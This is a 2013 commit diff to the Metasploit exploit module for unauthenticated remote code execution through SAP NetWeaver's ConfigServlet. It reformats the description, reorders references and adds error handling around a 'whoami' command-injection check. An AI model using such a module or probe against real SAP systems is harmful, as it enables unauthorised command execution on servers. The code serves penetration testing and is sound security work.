Do final cleanup for sap_configservlet_exec_noauth

jvazquez-r7 · jvazquez-r7 · commit 99b46202b9fd · 2013-04-26T08:45:34.000-05:00
diff --git a/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb b/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb
@@ -18,9 +18,9 @@ def initialize(info = {})
 		super(update_info(info,
 			'Name'            => 'SAP ConfigServlet Remote Code Execution',
 			'Description'     => %q{
-				This module allows remote code execution via operating system commands through
-				the SAP ConfigServlet without any authentication.
-				This module has been tested successfully with SAP NetWeaver 7.00 and 7.01 on Windows Server 2008 R2
+				This module allows remote code execution via operating system commands through the
+				SAP ConfigServlet without any authentication. This module has been tested successfully
+				with SAP NetWeaver 7.00 and 7.01 on Windows Server 2008 R2.
 			},
 			'Author'          =>
 				[
@@ -30,9 +30,9 @@ def initialize(info = {})
 			'License'         => MSF_LICENSE,
 			'References'      =>
 				[
-					[ 'URL', 'http://erpscan.com/wp-content/uploads/2012/11/Breaking-SAP-Portal-HackerHalted-2012.pdf'],
 					[ 'OSVDB', '92704'],
-					[ 'EDB', '24996']
+					[ 'EDB', '24996'],
+					[ 'URL', 'http://erpscan.com/wp-content/uploads/2012/11/Breaking-SAP-Portal-HackerHalted-2012.pdf']
 				],
 			'DisclosureDate' => 'Nov 01 2012', # Based on the reference presentation
 			'Platform'       => 'win',
@@ -63,7 +63,11 @@ def initialize(info = {})
 
 	def check
 		uri = normalize_uri(target_uri.path, 'ConfigServlet')
-		res = send_evil_request(uri, "whoami", 20)
+		begin
+			res = send_evil_request(uri, "whoami", 20)
+		rescue
+			Exploit::CheckCode::Unknown
+		end
 		if !res
 			Exploit::CheckCode::Unknown
 		elsif res.body.include?("Process created")
